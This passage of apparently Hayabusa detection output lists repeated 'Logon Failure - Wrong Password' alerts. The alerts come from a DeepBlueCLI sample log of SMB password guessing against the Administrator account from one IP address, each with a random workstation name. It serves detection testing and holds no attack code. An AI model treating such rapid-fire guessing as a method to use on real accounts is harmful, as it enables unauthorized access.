NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : 